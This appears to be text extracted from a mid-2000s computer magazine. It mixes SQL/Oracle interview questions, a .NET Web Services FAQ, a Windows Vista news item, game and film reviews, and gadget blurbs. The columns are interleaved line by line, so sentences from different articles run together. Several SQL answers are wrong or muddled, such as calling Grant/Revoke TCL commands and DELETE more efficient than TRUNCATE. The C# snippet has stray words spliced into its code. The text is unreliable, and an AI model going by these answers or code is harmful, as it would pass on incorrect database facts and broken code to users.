a) The rules stem from a single rule- the ‘zero rule’: For
10. WHAT IS ER-MODELING?
a system to Qualify as RELATIONAL DATABASE
Ans: The E-R modeling technique is the Top Down
MANAGEMENT system, it must use its
Approach. Entity relationship is technique for analysis and
RELATIONAL facilities to MANAGE the DATABASE
logical modeling of a system’s data requirements. It is the
Information Rule: Tabular Representation of
most widely used and has gained acceptance as the
Information.
ideal database design. It uses three basic units: entities,
c) Guaranteed Access Rule: Uniqueness of tuples for
their attributes and the relationship that exists between
guaranteed accessibility.
the entities. It uses a graphical notation for representing
d) Missing Information Rule: Systematic representation
these.
of missing information as NULL values.
11. WHAT IS NORMALIZATION?
e) Comprehensive Data Sub-Language Rule: QL to
Ans: Normalization is a step-by-step decomposition of
support Data definition, View definition, Data
manipulation, Integrity, Authorization and Security. complex records into simple records.
11. WHAT IS NORMALIZATION? 18. CLASSIFICATION OF SQL COMMANDS?
Ans: Normalization is a step-by-step decomposition of Ans: DDL (Data Definition Language) DML (Data
complex records into simple records. Manipulating Language) DCL (Data Control
12. WHAT ARE VARIOUS NORMAL FORMS OF Language) DTL(Data Transaction Language)
DATA? Create Alter Drop Select Insert Update Delete Rollback
Ans: The First Normal Form 1NF, The Second Normal Commit Grant Revoke
Form 2NF, The Third Normal Form 3NF, The Boyce
and Codd Normal Form BC NF. 19. WHAT IS DIFFERENCE BETWEEN DDL AND
13. WHAT IS DENORMALIZATION? DML COMMANDS?
Ans: The intentional introduction of redundancy to a Ans: For DDL commands autocommit is ON implicitly
table to improve performance is called whereas For DML commands autocommit is to be
DENORMALIZATION. turned ON explicitly.
14. WHAT ARE 1-TIER, 2-TIER, 3-TIER OR N- 20. WHAT IS DIFFERENCE BETWEEN A
TIER DATABASE ARCHITECTURES? TRANSACTION AND A QUERY?
Ans: 1-Tier Database Architecture is based on single Ans: A Transaction is unit of some commands where as
system, which acts as both server and client. 2-Tier Query is a single line request for the information from
Architecture is based on one server and client. 3-Tier the database.
Architecture is based on one server and client out that on 21. WHAT IS DIFFERENCE BETWEEN
client act as a remote system. N-Tier Architecture is TRUNCATE AND DELETE COMMANDS?
based on N no. Of servers and N no. Of clients. Ans: Truncate Command will delete all the records
where as Delete Command will delete specified or all
the records depending only on the condition given.
22. WHAT IS DIFFERENCE BETWEEN UPDATE
AND ALTER COMMANDS?
Ans: Alter command is used to modify the database
objects where as the Update command is used to modify
the values of a data base objects.
23. WHAT ARE COMMANDS OF TCL
CATEGORY?
Ans: Grant and Revoke are the two commands belong to
the TCL Category.
24. WHICH IS AN EFFICIENT COMMAND -
TRUNCATE OR DELETE? WHY?
Ans: Delete is the efficient command because using this
command we can delete only those records that are not
really required.
25. WHAT ARE RULES FOR NAMING A TABLE
15. WHAT ARE A TABLE, COLUMN, AND OR COLUMN?
RECORD? Ans: 1) Names must be from 1 to 30 bytes long.
Ans: Table: A Table is a database object that holds your 2) Names cannot contain quotation marks.
data. It is made up of many columns. Each of these 3) Names are not case sensitive.
columns has a data type associated with it. Column: A 4) A name must begin with an alphabetic character from
column, referred to as an attribute, is similar to a field in your database character set and the characters $ and #.
the file system. Record: A row, usually referred to as But these characters are discouraged.
tuple, is similar to record in the file system. 5) A name cannot be ORACLE reserved word.
16. WHAT IS DIFFERENCE BETWEEN A 6) A name must be unique across its namespace. Objects
PROCEDURAL LANGUAGE AND A in the name space must have different names.
NON-PROCEDURAL LANGUAGE? 7) A name can be enclosed in double quotes.
Ans:
Procedural Language NON-Procedural Language
A program in this implements a step-by-step algorithm
to solve the problem. It contains what to do but not how
to do
17.WHAT TYPE OF LANGUAGE "SQL" IS?
Ans: SQL is a Non-procedural, 4th generation
Language,/ which concerts what to do rather than how to
do any process.
OT: Official
Name for
Windows 26. HOW MANY COLUMNS CAN A TABLE 34. WHAT IS A CONSTRAINT? WHAT ARE
"Longhorn" HAVE? ITS VARIOUS LEVELS?
Announced Ans: A Table can have 1000 columns. Ans: Constraint: Constraints are representators of
27. WHAT ARE DIFFERENT DATATYPES the column to enforce data entity and
The next version SUPPORTED BY SQL? consistency.There r two levels
of Windows Ans: Char (size), Nchar (size), Varchar2 (size),
finally has an 1)Column-level constraints 2)Table-level
official name: Nvarchar2 (size) data types for character values, constraints.
Windows Vista. Number (precision, scale), Number, Number (n), Float, 35. LIST OUT ALL THE CONSTRAINTS
The advertising Float (binary precision) data types for numerical values, SUPPORTED BY SQL.
tagline for Vista Date data type for date values, Long, Raw (size), Long
is "Clear, Ans: Not Null, Unique, Check, Primary Key and
Confident, Raw, Clob, Blob, Nclob, Bfile for large objects. Foreign Key or Referential Integrity.
Connected: 28. WHAT IS DIFFERENCE BETWEEN LONG 36. WHAT IS DIFFERENCE BETWEEN
Bringing clarity AND LOB DATATYPES? UNIQUE+NOT NULL AND PRIMARY KEY?
to your world," Ans: LOB LONG
according to a Ans: Unique and Not Null is a combination of two
video of the 1) The maximum size is 4GB. Constraints that can be present any number of times
announcement 2) LOBs (except NCLOB) can be attributes of an object in a table and can’t be a referential key to any
posted by type. column of an another table where as Primary Key is
Microsoft. 3) LOBs support random access to data. single Constraint that can be only once for table and
4) Multiple LOB columns per table or LOB attributes in can be a referential key to a column of another table
an object type. becoming a referential integrity.
1) The maximum size is 2GB. 2) LONGs cannot. 3) 37. WHAT IS A COMPOSITE PRIMARY
LONGs support only sequential access. KEY?
4) Only one LONG column was allowed in a table Ans: A Primary key created on combination of
29. WHAT IS DIFFERENCE BETWEEN CHAR columns is called Composite Primary Key.
AND VARCHAR2 DATATYPES? 39. HOW TO DEFINE A NULL VALUE?
Ans: Varchar2 is similar to Char but can store variable Ans: A NULL value is something which is
no. Of characters and while querying the table varchar2 unavailable, it is neither zero nor a space and any
trims the extra spaces from the column and fetches the mathematical calculation with NULL is always
rows that exactly match the criteria. NULL.
30. HOW MUCH MEMORY IS ALLOCATED FOR 40. WHAT IS NULL? A CONSTRAINT OR
The company also DATE DATATYPE? WHAT IS DEFAULT DEFAULT VALUE?
said Friday that the DATE FORMAT IN ORACLE? Ans: It is a default value.
first beta, or test Ans: For Date data type oracle allocates 7 bytes
release, of Vista is 41. WHAT IS DEFAULT VALUE FOR EVERY
Memory. Default Date Format is: DD-MON-YY. COLUMN OF A TABLE?
slated for release by
Aug. 3. That release 31. WHAT IS RANGE FOR EACH DATATYPE OF Ans: NULL.
will be targeted at SQL? 42. WHAT IS CREATED IMPLICITLY FOR
developers and IT Ans: Datatype Range Char Varchar2 Number Float
professionals, said EVERY UNIQUE AND PRIMARY KEY
LONG, RAW, LONGRAW Large Objects (LOB’s) COLUMNS?
Brad Goldberg,
general manager of 2000 bytes 4000 bytes Precision 1 to 38 Scale -84 to 127 Ans: Index.
Windows product Precision 38 decimals Or 122 binary precision 2 GB 43. WHAT ARE LIMITATIONS OF CHECK
development ... The 4GB
software giant spent CONSTRAINT?
32. HOW TO RENAME A COLUMN? Ans: In this we can't specify Pseudo Columns like
roughly eight
months researching Ans: We can’t rename a Column of a table directly. So sysdate etc.
potential names for we follow the following steps. To Rename a Column: 44. WHAT IS DIFFERENCE BETWEEN
the upcoming a) Alter the table specifying new column name to be
version of REFERENCES AND FOREIGN KEY
given and data type. Then copy the values in the column CONSTRAINT?
Windows.
to be renamed into new column. Ans: References is used as column level key word
c) drop the old column. where as foreign key is used as table level
33. HOW TO DECREASE SIZE OR CHANGE constraint.
DATATYPE OF A COLUMN? 45. WHAT IS "ON DELETE CASCADE"?
Ans: To Decrease the size of a Data type of a column Ans: when this key word is included in the
i. Truncate the table first. definition of a child table then whenever the records
ii. Alter the table column whose size is to be decreased from the parent table is deleted automatically the
using the same name and data type but new size. respective values in the child table will be deleted.
46. WHAT IS PARENT-CHILD OR MASTER- 59. WHAT IS A CORRELATED SUB QUERY,
DETAIL RELATIONSHIP? HOW IT IS DIFFERENT FROM A NORMAL
Ans: A table which references a column of another SUB QUERY?
table(using References)is called as a child table(detail Ans: A correlated subquery is a nested subquery,
table) and a table which is being referred is called which is executed once for each ‘Candidate row’ by
Parent (Master) Table . the main query, which on execution uses a value from
47. HOW TO DROP A PARENT TABLE WHEN a column in the outer query. In normal sub query the
IT’S CHILD TABLE EXISTS? result of inner query is dynamically substituted in the
Ans: Using "on delete cascade". condition of the outer query where as in a correlated
48. IS ORACLE CASE SENSITIVE? subquery, the column value used in inner query refers
Ans: NO to the column value present in the outer query forming
49. HOW ORACLE IDENTIFIES EACH a correlated subquery.
RECORD OF TABLE UNIQUELY? 60. WHAT IS A JOIN - TYPES OF JOINS?
Ans: By Creating indexes and reference IDs. Ans: A join is used to combine two or more tables
50. WHAT IS A PSEUDO-COLUMN? NAME logically to get query results. There are four types of
SOME PSEUDO-COLUMNS OF ORACLE? Joins namely EQUI Join NON-EQUI Join SELF Join
Ans: Columns that are not created explicitly by the OUTER Join.
user and can be used explicitly in queries are called 61. WHAT ARE MINIMUM REQUIREMENTS
Pseudo-Columns. FOR AN EQUI-JOIN?
Ex:currval,nextval,sysdate…. Ans: There shold be atleast one common column
51. WHAT FOR "ORDER BY" CLAUSE FOR A between the joining tables.
QUERY? 62. WHAT IS DIFFERENCE BETWEEN LEFT,
Ans: To arrange the query result in a specified RIGHT OUTER JOIN?
order(ascending,descending) by default it takes Ans:If there r any values in one table that do not have
ascending order. corresponding values in the other,in an equi join that
52. WHAT IS "GROUP BY" QUERIES? row will not be selected.Such rows can be forcefully
Ans: To group the query results based on condition. selected by using outer join symbol(+) on either of the
53. NAME SOME AGGREGATE FUNCTIONS sides(left or right) based on the requirement.
OF SQL? 63. WHAT IS DIFFERENCE BETWEEN EQUI
Ans: AVG, MAX, SUM, MIN,COUNT. AND SELF JOINS?
54. WHAT IS DIFFERENCE BETWEEN COUNT Ans: SELF JOIN is made within the table whereas
(), COUNT (*) FUNCTIONS? EQUI JOIN is made between different tables having
Ans: Count () will count the specified column whereas common column.
count (*) will count total no. of rows in a table. 64. WHAT ARE "SET" OPERATORS?
55. WHAT FOR ROLLUP AND CUBE Ans: UNION, INTERSECT or MINUS is called SET
OPERATORS ARE? OPERATORS.
Ans: To get subtotals and grand total of values of a 65. WHAT IS DIFFERENCE BETWEEN
column. "UNION" AND "UNION ALL" OPERATORS?
56. WHAT IS A SUB-QUERY? Ans: UNION will return the values distinctly whereas
Ans: A query within a query is called a sub query UNION ALL will return even duplicate values.
where the result of inner query will be used by the
outer query. ****END of Part 1****
57. WHAT ARE SQL OPERATORS? ****Will continue in next issue****
Ans: Value (), Ref () is SQL operator.
58. EXPLAIN
"ANY","SOME","ALL","EXISTS"
OPERATORS?
Ans: Any: The Any (or it’s synonym SOME) operator
computes the lowest value from the set and compares
a value to each returned by a sub query. All: ALL
compares a value to every value returned by SQL.
Exists: This operator produces a BOOLWAN results.
If a sub query produces any result then it evaluates it
to TRUE else it evaluates it to FALSE.
What platforms do .NET XML Web Services run on?
Currently, they're supported on Windows 2000 and Windows
XP. ASP.NET integrates with Internet Information Server
(IIS) and thus requires that IIS be installed. It runs on server
and non-server editions of Windows 2000 and XP as long as
IIS is installed.
Can two different programming languages be mixed in a
single ASMX file?
No.
What is code-behind?
Code-behind allows you to associate Web Service source code
written in a CLR compliant language (such as C# or VB.NET)
as compiled in a separate file (typically *.asmx.cs or
*.asmx.vb). You would otherwise typically find the executable
code directly inserted into the .asmx file.
What namespaces are imported by default in ASMX files?
The following namespaces are imported by default. Other
namespaces must be imported manually.· System,
System.Collections,System.ComponentModel,System.Data,
System.Diagnostics,System.Web,System.Web.Services
How do I provide information to the Web Service when the
information is required as a SOAP Header?
The key here is the Web Service proxy you created using
wsdl.exe or through Visual Studio .NET's Add Web Reference
menu option. If you happen to download a WSDL file for a
Web Service that requires a SOAP header, .NET will create a
SoapHeader class in the proxy source file. Using the previous
example:
public class Service1 :
System.Web.Services.Protocols.SoapHttpClientProtocol
{
public AuthToken AuthTokenValue;
[System.Xml.Serialization.XmlRootAttribute(Namespace="http
://tempuri.org/", IsNullable=false)]
public class AuthToken : SoapHeader { public
string Token; }}
In this case, when you create an instance of the proxy in your
main application file, you'll also create an instance of the
AuthToken class and assign the string:
Service1 objSvc = new Service1();
processingobjSvc.AuthTokenValue = new AuthToken();
objSvc.AuthTokenValue.Token = <actual token value>;
Web Servicestring strResult =
objSvc.MyBillableWebMethod();
What is WSDL?
WSDL is the Web Service Description Language, and it is
implemented as a specific XML vocabulary. While it's very
much more complex than what can be described here, there are
two important aspects to WSDL with which you should be
aware. First, WSDL provides instructions to consumers of
Web Services to describe the layout and contents of the SOAP
packets the Web Service intends to issue. It's an interface
description document, of sorts. And second, it isn't intended
that you read and interpret the WSDL. Rather, WSDL should
be processed by machine, typically to generate proxy source
code (.NET) or create dynamic proxies on the fly (the SOAP
Toolkit or Web Service Behavior).
Rome: Total War Barbarian Invasion
Sega ships Rome: Total War expansion; add-on takes place There are some major new additions to the real-time battle
200 years after original game, features 10 new factions, night system as well. The biggest is the introduction of night
battles, and more. battles in the expansion. This means that you'll now see
formations in the distance by their torches, and you'll also
The union of Sega and The Creative Assembly has yielded see cool lighting effects, such as the way a blazing fireball
its first fruit today, as the Rome: Total War Barbarian briefly illuminates the ground as it flies through the air.
Invasion expansion pack is now headed to retailers across One big question that remains, though, is whether Creative
Europe and North America. Assembly can retrofit night battles into the original Rome:
Total War. It's something that the company is looking into,
but it may require a lot of code changes it doesn't have
Set 200 years after the main campaign of Rome: Total War, time for. Another new addition is that some types of units
Barbarian Invasion sees the outsider hordes massing on the now have limited swimming ability, so they'll be able to
borders of a declining Roman Empire. It's up to players to wade into a river and even swim a short distance, giving
decide whether they will save Rome from its enemies or you some extra mobility on the battlefield, as well as a
simply sack it. In addition to the new campaign mode, way to escape entrapment. Of course, there are plenty of
Barbarian Invasion adds new features and units to the real- new units to play with as well.
time strategy game. There are 10 new factions, more than
100 new units, night battles, revamped artificial intelligence
in battles, and more.
Ultimate Spider-Man
The Good The Ultimate Spider-Man comic series is a reenvisioning of
Colorful, crisp cel-shading gives the game an awesome the early days of Spider-Man lore. Here, Peter Parker is a
comic book-inspired look; Some excellent boss fights; scrawny 15-year-old kid, granted his powers via the
Sharp voice acting and writing; Good story; infamous radioactive spider on a class field trip. The plot of
The Bad the Ultimate Spider-Man game doesn't spend much time
Too many lame race and chase missions; Too few story getting you up to speed with this, instead taking just a brief
missions--remaining side missions aren't good enough to minute or two to quickly show Parker's transformation into
warrant much replay value; Camera can sometimes make the titular hero, as well as a bit of backstory about how he
combat a pain; and his childhood friend, Eddie Brock, stumble upon a
Serious webheads will get something positive out of mysterious bioengineered suit that both their fathers had
Ultimate Spider-Man, but they should do so with one of apparently been working on before their deaths. As any
the console versions, as the PC version of the game isn't comic aficionado might assume, this is the suit that turns
the ideal one. Brock into the gruesome, tongue-lashing beast known as
Venom, and that's right where things pick up. The plot itself
is something of a disjointed affair; it's really more of an
Superhero games, like superhero movies, are steadily
excuse to squeeze as many relevant Marvel characters as
starting to improve. Generally, it helps to base a game
possible into the package. But it does a good job of
more within a hero's given comic-book universe, as
achieving this goal by including plenty of friendly faces such
opposed to directly upon any of the aforementioned films.
as Wolverine and the Human Torch, as well as modern
Compare the recent Incredible Hulk and X-Men games
versions of big-time villains such as Carnage, Electro, Green
based within the comic universe with the Fantastic Four
Goblin, and, of course, Venom himself.
and Batman games based on films; the difference ought to
be clear. One franchise that's been stuck somewhere in the
middle over its last couple of installments is the Spider- The story ends up a winner because it sticks so closely to its
Man series. The first two games were based directly on the comic-book roots--it's just too bad that there isn't very much
megapopular films, and while neither could be called bad, of it. To get through the entire story mode, it shouldn't take
they weren't anything to write home about. Ultimate you more than a half-dozen hours at most, and only about
Spider-Man is developer Treyarch's third attempt to make five hours of that actually make up story missions. Ultimate
a quality Spidey game, by way of developer Beenox, Spider-Man retains the sort of open-ended nature of Spider-
which has ported the console game to the PC. Based on the Man 2, letting you roam around the city of New York,
eponymous comic-book series, Ultimate Spider-Man is swinging your way to assorted side missions scattered about
certainly an improvement, adding a great sense of comic- the town. Most of these are basic checkpoint races, combat
book style to the package and getting a whole host of missions in which your entire goal is to beat up a bunch of
familiar Marvel characters into the mix. Unfortunately, it gang members, and city events, which simply consist of
also suffers from some of the familiarly flawed gameplay quick-rescue operations and breakups of bank robberies or
of its predecessors, and it's a disappointingly short ride. what have you. These missions aren't optional, though. They
appear that way at first, but you'll soon find that you have to
beat them to unlock more story missions--and in some cases,
you only unlock a cutscene and then have to go back out into
the city to beat more side missions to move on again.
Essentially, it feels like the developers quickly ran out of
story and hastily decided to make these missions required
play to pad out the length.
This padding really does kill some of the fun, because the
races, of which you'll be doing the most of early on in the
game, just aren't much fun. The combat tours and city events
make more sense, since Spidey's known for swooping down,
whooping some ass, and then swinging away into the sunset.
But these missions are far too repetitive, requiring you to
perform many of the same tasks over and over again until
you just don't want to do them anymore. This is doubly
unfortunate, because that's pretty much all there is to do once
the story mode is over with.
Fortunately, the story missions are a lot better, especially the boss The city of New York has also been scaled down here, but
fights against the main villains, as well as the several sections that's not a detriment. Though there's less area to cover,
where you play as Venom. These fights are often challenging and the areas themselves look a lot better. That's thanks mostly
satisfying, though the final confrontation is a bit anticlimactic. to the game's entirely new art style, which uses a unique
The game also leans a little too heavily on chase missions, where cel-shading concept to give every character and set piece a
your goal is, again, to race around the city, but with the twist of brightly colorful and sharp look. The character models are
having to stay within a specific distance of the opposing so sharp looking, in fact, that they look like they've leapt
character. It's an OK idea in theory, but there are too many of off a comic page--though perhaps that's because the game
these sequences, and it can sometimes be tough to get a good goes to painstaking lengths to try to emulate the comic
bearing on where your target is, since there's no icon or anything book's style, creating multiple cutscenes that frame their
denoting where the target is--all you get is a sometimes unhelpful shots within the boxes of a comic. All this gives Ultimate
arrow to point you in the right direction. Were there more of the Spider-Man a wonderful sense of style that the previous
big, epic fights against the villains and more variety to the day-to- two games lacked. Admittedly, there are still a few
day rescues and crime stoppage, Ultimate Spider-Man would be a problems. The camera can get very uppity, especially in
lot better off. tight spaces, and the PC version suffers from a bad frame
rate in a lot of spots, especially when you're webswinging.
For those who played either of the last couple of Spider-Man Turning down effects makes no difference, nor does the
games, Ultimate Spider-Man features a couple of key gameplay resolution. Parts of this game simply don't run well.
differences. For one, the combat is less clunky. Spider-Man
attacks with simple, effective combos that don't require much Ultimate Spider-Man features no celebrity voice acting,
more than a few bits of button mashing. You can still combine but that's not a problem. The actors who portray the
Spidey's webs into the fray, but there's less you can actually do characters do excellent work lending realistic and
with that. Venom's attacks are similarly simple, though they rely sometimes appropriately goofy spins to these modernized
more on whips of his tendrils and powerful killing moves, unlike versions of classic characters. The dialogue is mostly quite
Spider-Man's quick and nimble maneuvers. Venom also has to sharp, getting Spidey's snarky tone down pat and dealing
deal with an ever-draining life force, requiring him to out a fair number of amusing one-liners. The only failing
occasionally feed on enemies and helpless passersby. It's pretty of the dialogue is that in-game, Spider-Man's wisecracks
brutal, since you can basically feed on and kill any man, woman, often repeat ad nauseam and get old quickly. The rest of
or child that happens into the brute's path. It also makes the the audio features plenty of thwacks, whaps, and biffs, as
Venom sequences a lot easier, since most areas give him plenty well as a fairly subdued soundtrack that seems to come in
of people with which to quench his thirst. Spider-Man's portions and out at random intervals--not because it's broken or
often lack health power-ups, which makes them a touch more anything, but it just isn't quite as well edited as it could
challenging--and sometimes, frustrating. have been.
The methodology for getting around New York has also been Ultimate Spider-Man is a better game than Treyarch's
simplified, though with mixed results. Spider-Man's previous efforts, but it still relies too heavily on the
webswinging mechanic requires a lot less effort on your part this novelty of swinging around the city and beating up the
time around. You can't shoot multiple webs anymore; you're same bad guys over and over again--a novelty made less
effectively limited to single, standard-swinging webs, as well as a so by the simplification of both mechanics. It's especially
web-boost shot that lets you leap great distances. Venom throws distressing that the developer was clearly able to put
all that webswinging by the wayside, opting to just leap hundreds together a solid story and some great boss fights, yet was
of feet in the air and occasionally use his tendrils to cover unable to cull together enough of them to make a great
distances quickly, not unlike in the web boost. While all of that's game. Serious webheads will get something positive out of
well and good, jumping and swinging around the city just isn't as Ultimate Spider-Man, but they should do so with one of
interesting as it's been in the past. The simplification of the the console versions, as the PC version of the game isn't
webswing mechanic also seems to have slowed the overall feel of the ideal one.
your swinging, and it's just not all that thrilling to swing around
the city--which is pretty much the opposite of the case in the past
games. Admittedly, it is neat to jump around with Venom, since
he does handle differently from Spidey, but there aren't many
Venom sequences in the game. Incidentally, regardless of which
character you're playing as, you're going to want to use a good
dual analog gamepad for this game. Keyboard and mouse
controls are too unwieldy for both combat and webswinging.
Fable – The Lost Chapters
Fable is an imaginative game that's got enough remarkable, You begin Fable as a young child, and it's here that you're
unique moments in it to make it shine. introduced to the game's moral alignment system, its sense of
humor, and its dark edge--as well as its basic controls, which
Some heroes are made when they rise to the occasion. Others will be mostly intuitive if you've played other third-person
build their reputations over time. This latter case is the perspective games recently. Your first order of business is to
subject of Fable: The Lost Chapters, a game in which you earn a few gold pieces with which to purchase a birthday gift
get to vicariously experience the life of an archetypal fantasy for your sister. Whether you make the money by being
hero, and, in some respects, decide what eventually becomes helpful or by making trouble is up to you. This initial
of him. Originally released for the Xbox last year, Fable was choose-your-own-adventure-style sequence is quite
one of the most highly anticipated games since the Xbox's impressive in the amount of freedom and variety it affords
debut, and the latest title overseen by visionary game you, and it suggests that Fable will constantly challenge you
designer Peter Molyneux since 2001's innovative Black & to make moral decisions like the ones presented early on. For
White. Like that game, Fable invites you to solve problems example, will you help a little kid fend off a bully, or will
either by being good or by being evil, and to watch as the you join in on the bullying (or beat them both up)? These
effects of your decisions gradually take a noticeable toll on decisions are so ethically basic that they're not at all difficult
your persona. Fable also features a number of novel to make, but it's still interesting to see how the game plays
elements, such as how your hero's appearance gradually out depending on what you do. You'll discover, though, that
changes with age, and how villagers respond differently to Fable's introduction is not reflective of most of the game's
him depending on his reputation, looks, and other factors. quests, which don't give you many choices. At any rate, soon
These elements serve to significantly differentiate a game after you complete your first main task, something sinister
that's actually pretty straightforward in terms of how it plays. happens. Fortunately for your young character, he is saved
Beneath the surface, Fable is a well-put-together but standard by an enigmatic man who transports him to the Heroes'
action adventure, primarily consisting of lots of basic combat Guild, where he is to be trained to become an adventurer.
and running from point to point. Mind you, this is a
decidedly great game, all in all. Its most interesting, riskiest
features may lie at the fringes rather than at the core--but
they're there.
The Alliance, Whedon's totalitarian galactic state, wants With "Serenity," Whedon has his cake and eats it too—
River back—even at the cost of starting a small wrapping up most of the major plots and themes of
interplanetary war. Actor Chiwetel Ejiofor plays "Firefly," while leaving the door open (just a crack) for a
Serenity's deadly nemesis, an unnamed "operative" with new series—maybe even another film. This second
steely resolve and murderous methods. The calm, polite chance deserves a third.
Ejiofor is the greatest asset in Whedon's war of
ideologies.
Written and directed by Joss Whedon; cinematography by Jack N. Green; production design by Barry
Chusid; music by David Newman; edited by Lisa Lassek; produced by Barry Mendel. A Universal
Pictures release; opens Friday. Running time: 1:59. MPAA rating: Rated PG-13 (for sequences of intense
violence and action, and some sexual references).
Watching this movie, absorbed by its storytelling, touched by its beauty, fascinated by the bond between the boy and the
animal, I was also astonished by something else: The studio does not know if it is commercial! The most dismal
stupidities can be inflicted on young audiences, but let a family movie come along that is ambitious and visionary, and
distributors lose confidence. It's as if they fear some movies are better than the audience can handle.
"Duma" has had test runs in the Southwest. Now it opens in Chicago, and the box office performance here will decide its
fate. That is not a reason to see it. Moviegoers do not buy tickets to "support" a movie, nor should they. The reason to see
"Duma" is that it's an extraordinary film, and intelligent younger viewers in particular may be enthralled by it.
Tux iPod Stand
Sony Bean
Alienware has created a Star Wars-branded desktop Logitech has released an LCD keyboard for the regular
system. The special Aurora models are available in computer users. This keyboard has a slew of
Dark Side and Rebel Alliance flavors. The systems interesting features including an external temperature
come equipped with the AMD Athlon 64 FX-55 CPU. sensor, a ‘dashboard’ displaying the time and current
They’ll be on sale to the public soon for a yet user, along with media and email notifications. There’s
undisclosed price. even a feature that turns the keyboard itself into a
calculator, using the keypad, and then pastes the results
into the clipboard. Plus it’s cordless. Super cool.
Motorola RAZRBerry
Bluetooth Wireless Module for iPod Pioneer just dropped two new receivers, the VSA-
AX4AVi and the VSX-AX2AV. Both are 7-channel
amplifiers, they support HDMI & WMA9 encoding.
The VSA-AX4AVi is tres hot because it accepts USB
connections from all kinds of audio players including
the Apple iPod. Otherwise, the differences are pretty
standard: the 7-channel VSA-AX4AVi rocks at 220W
per channel and the VSX-AX2AV runs 200Wx7
channels.
Canon PowerShot S2 IS